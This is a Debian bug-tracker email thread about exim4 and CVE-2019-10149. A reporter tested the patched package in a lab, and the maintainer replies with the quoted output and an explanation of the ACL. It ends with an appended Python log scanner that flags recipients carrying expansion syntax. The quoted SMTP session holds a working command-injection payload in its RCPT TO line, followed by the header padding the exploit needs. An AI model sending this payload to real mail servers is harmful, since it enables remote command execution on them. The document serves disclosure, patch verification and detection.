Your message dated Tue, 11 Jun 2019 19:40:30 +0200
with message-id <[email protected]>
and subject line Re: Bug#930361: exim4: Further on to CVE-2019-10149
has caused the Debian Bug report #930361,
regarding exim4: Further on to CVE-2019-10149
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
930361: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=930361
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: exim4
Version: 4.89-2+deb9u4
Severity: important

Dear Maintainer,

This is just an FYI and I sure hope it's nothing.

In light of CVE-2019-10149

What I did was build a vagrant instance with Exim 4.89-2+deb9u3 to
replicate the POC.

Please see https://pastebin.com/raw/EiLbpsH4 for successful
exploitation.

What was of interest to me, I upgraded to 4.89-2+deb9u4 and redid the POC.

Please see https://pastebin.com/raw/iqaJyHt2, but you will see is, the
file POC does not work, BUT mail still gets accepted.

Please see https://pastebin.com/raw/YLS7CBHY

I just want to double check if this is correct / acceptable.

Kind Regards
Brent Clark
P.s. Just a Q of food for thought, should not CHECK_RCPT_LOCAL_LOCALPARTS and / or CHECK_RCPT_REMOTE_LOCALPARTS be updated in /etc/exim4/conf.d/main/01_exim4-config_listmacrosdefs?

-- Package-specific info:
Exim version 4.89 #2 built 28-May-2019 20:13:55
Copyright (c) University of Cambridge, 1995 - 2017
(c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2017
Berkeley DB: Berkeley DB 5.3.28: (September  9, 2013)
Support for: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM DNSSEC Event OCSP PRDR SOCKS TCP_Fast_Open
Lookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb dsearch nis nis0 passwd
Authenticators: cram_md5 plaintext
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile/maildir/mailstore autoreply lmtp pipe smtp
Fixed never_users: 0
Configure owner: 0:0
Size of off_t: 8
Configuration file is /var/lib/exim4/config.autogenerated
# /etc/exim4/update-exim4.conf.conf
#
# Edit this file and /etc/mailname by hand and execute update-exim4.conf
# yourself or use 'dpkg-reconfigure exim4-config'
#
# Please note that this is _not_ a dpkg-conffile and that automatic changes
# to this file might happen. The code handling this will honor your local
# changes, so this is usually fine, but will break local schemes that mess
# around with multiple versions of the file.
#
# update-exim4.conf uses this file to determine variable values to generate
# exim configuration macros for the configuration file.
#
# Most settings found in here do have corresponding questions in the
# Debconf configuration, but not all of them.
#
# This is a Debian specific file

dc_eximconfig_configtype='local'
dc_other_hostnames='REMOVED'
dc_local_interfaces='127.0.0.1 ; ::1'
dc_readhost=''
dc_relay_domains='stephan.trial.co.za'
dc_minimaldns='false'
dc_relay_nets=''
dc_smarthost=''
CFILEMODE='644'
dc_use_split_config='false'
dc_hide_mailname=''
dc_mailname_in_oh='true'
dc_localdelivery='mail_spool'
mailname:stephan.trial.co.za
# /etc/default/exim4
EX4DEF_VERSION=''

# 'combined' -   one daemon running queue and listening on SMTP port
# 'no'       -   no daemon running the queue
# 'separate' -   two separate daemons
# 'ppp'      -   only run queue with /etc/ppp/ip-up.d/exim4.
# 'nodaemon' - no daemon is started at all.
# 'queueonly' - only a queue running daemon is started, no SMTP listener.
# setting this to 'no' will also disable queueruns from /etc/ppp/ip-up.d/exim4
QUEUERUNNER='combined'
# how often should we run the queue
QUEUEINTERVAL='30m'
# options common to quez-runner and listening daemon
COMMONOPTIONS=''
# more options for the daemon/process running the queue (applies to the one
# started in /etc/ppp/ip-up.d/exim4, too.
QUEUERUNNEROPTIONS=''
# special flags given to exim directly after the -q. See exim(8)
QFLAGS=''
# Options for the SMTP listener daemon. By default, it is listening on
# port 25 only. To listen on more ports, it is recommended to use
# -oX 25:587:10025 -oP /run/exim4/exim.pid
SMTPLISTENEROPTIONS=''

-- System Information:
Debian Release: 9.9
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 4.9.0-9-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages exim4 depends on:
ii  debconf [debconf-2.0]  1.5.61
ii  exim4-base             4.89-2+deb9u4
ii  exim4-daemon-light     4.89-2+deb9u4

exim4 recommends no packages.

exim4 suggests no packages.

-- debconf information:
  exim4/drec:

--- End Message ---
--- Begin Message ---
[ all pastebin references unpacked, there is no point hyperlinking to a temporary URL instead of quoting ]

On 2019-06-11 Brent Clark <[email protected]> wrote:
[...]
> What was of interest to me, I upgraded to 4.89-2+deb9u4 and redid the POC.

> Please see https://pastebin.com/raw/iqaJyHt2,

|-------
|root@stretch:/tmp# nc 127.0.0.1 25
|220 stretch.localdomain ESMTP Exim 4.89 Tue, 11 Jun 2019 14:07:52 +0200
|HELO localhost
|250 stretch.localdomain Hello localhost [127.0.0.1]
|MAIL FROM:<>
|250 OK
|RCPT TO:<${run{\x2Fbin\x2Fsh\t-c\t\x22id\x3E\x3E\x2Ftmp\x2Fid\x22}}@localhost>
|250 Accepted
|DATA
|354 Enter message, ending with "." on a line by itself
|Received: 1
|Received: 2
|Received: 3
|Received: 4
|Received: 5
|Received: 6
|Received: 7
|Received: 8
|Received: 9
|Received: 10
|Received: 11
|Received: 12
|Received: 13
|Received: 14
|Received: 15
|Received: 16
|Received: 17
|Received: 18
|Received: 19
|Received: 20
|Received: 21
|Received: 22
|Received: 23
|Received: 24
|Received: 25
|Received: 26
|Received: 27
|Received: 28
|Received: 29
|Received: 30
|Received: 31
|.
|250 OK id=1hafZz-0004D0-Ru
|
|500 unrecognized command
|QUIT
|221 stretch.localdomain closing connection
|root@stretch:/tmp# ls -la
|total 36
|drwxrwxrwt  8 root    root    4096 Jun 11 14:07 .
|drwxr-xr-x 23 root    root    4096 Jun 11 13:40 ..
|drwxrwxrwt  2 root    root    4096 Jun 11 13:40 .font-unix
|drwxrwxrwt  2 root    root    4096 Jun 11 13:40 .ICE-unix
|drwx------  3 root    root    4096 Jun 11 13:40 systemd-private-5d1060dcb58a4946aed710f5f45dfe13-systemd-timesyncd.service-CwbWnF
|drwxrwxrwt  2 root    root    4096 Jun 11 13:40 .Test-unix
|-rwx--x--x  1 vagrant vagrant 1657 Jun 11 13:40 vagrant-shell
|drwxrwxrwt  2 root    root    4096 Jun 11 13:40 .X11-unix
|drwxrwxrwt  2 root    root    4096 Jun 11 13:40 .XIM-unix
|-------

> but you will see is, the
> file POC does not work, BUT mail still gets accepted.

> Please see https://pastebin.com/raw/YLS7CBHY

|-------
|0m   699 1hafZz-0004D0-Ru <> *** frozen *** 
|           ${run{\x2Fbin\x2Fsh\t-c\t\x22id\x3E\x3E\x2Ftmp\x2Fid\x22}}@localhost
|-------

> I just want to double check is this is correct / acceptable.
[...]

Yes, you are connecting from the same host, i.e. this part of the rcpt ACL:
  # Accept if the message comes from one of the hosts for which we are an
  # outgoing relay. It is assumed that such hosts are most likely to be MUAs,
  # so we set control=submission to make Exim treat the message as a
  # submission. It will fix up various errors in the message, for example, the
  # lack of a Date: header line. If you are actually relaying out from
  # MTAs, you may want to disable this. If you are handling both relaying from
  # MTAs and submissions from MUAs you should probably split them into two
  # lists, and handle them differently.

  # Recipient verification is omitted here, because in many cases the clients
  # are dumb MUAs that don't cope well with SMTP error responses. If you are
  # actually relaying out from MTAs, you should probably add recipient
  # verification here.

cu Andreas
-- 
`What a good friend you are to him, Dr. Maturin. His other friends are
so grateful to you.'
`I sew his ears on from time to time, sure'

--- End Message ---
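As an added example, not from the bug report or from the Debian exim4 package, the following Python helper scans Exim main-log arrival lines for recipients whose local part carries `${...}` expansion syntax like the `${run{...}}` address quoted above, and decodes the `\xHH` and `\t` escapes so an analyst can read what the local part would expand to. The log lines are constructed for the example; message ids, host names and timestamps are made up.

```python
import re

# Constructed sample Exim main-log lines (not taken from the bug report).
# The first carries the recipient local part quoted in the report; the
# second is a benign arrival for a normal mailbox.
SAMPLE_LOG = (
    "2019-06-11 14:07:55 1hafZz-0004D0-Ru <= <> H=localhost [127.0.0.1] "
    "P=esmtp S=699 for "
    "${run{\\x2Fbin\\x2Fsh\\t-c\\t\\x22id\\x3E\\x3E\\x2Ftmp\\x2Fid\\x22}}@localhost\n"
    "2019-06-11 14:08:01 1hafa5-0004D6-Qz <= alice@example.org "
    "H=mail.example.org [192.0.2.10] P=esmtp S=1201 for bob@stephan.trial.co.za\n"
)

# Backslash escapes that Exim string expansion interprets inside an
# expansion argument; \xHH is the form the quoted payload relies on.
_ESCAPE = re.compile(r"\\(x[0-9A-Fa-f]{2}|[tnr\\])")
_SIMPLE = {"t": "\t", "n": "\n", "r": "\r", "\\": "\\"}

def unescape_expansion(text):
    """Decode \\xHH and \\t-style escapes the way Exim expansion would."""
    def repl(m):
        tok = m.group(1)
        return chr(int(tok[1:], 16)) if tok[0] == "x" else _SIMPLE[tok]
    return _ESCAPE.sub(repl, text)

def expansion_items(local_part):
    """Names of ${item ...} expansion operators present in a local part."""
    return re.findall(r"\$\{([a-z_]+)", local_part)

def check_recipient(address):
    """Return a finding for a recipient whose local part has expansion syntax, else None."""
    local_part, _, domain = address.rpartition("@")
    items = expansion_items(local_part)
    if not items:
        return None
    return {"address": address, "domain": domain, "items": items,
            "decoded_local_part": unescape_expansion(local_part)}

# Arrival ("<=") lines end with "for <recipient>"; the recipient has no spaces.
_RCPT = re.compile(r" <= .* for (\S+)\s*$")

def scan_log(text):
    """Findings for every arrival line whose recipient local part is suspect."""
    findings = []
    for line in text.splitlines():
        m = _RCPT.search(line)
        if m:
            hit = check_recipient(m.group(1))
            if hit:
                findings.append(hit)
    return findings
```

Run it over a real mainlog to triage frozen messages like the one listed in the report: a hit means the recipient was accepted by the ACL and only stopped later in routing.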
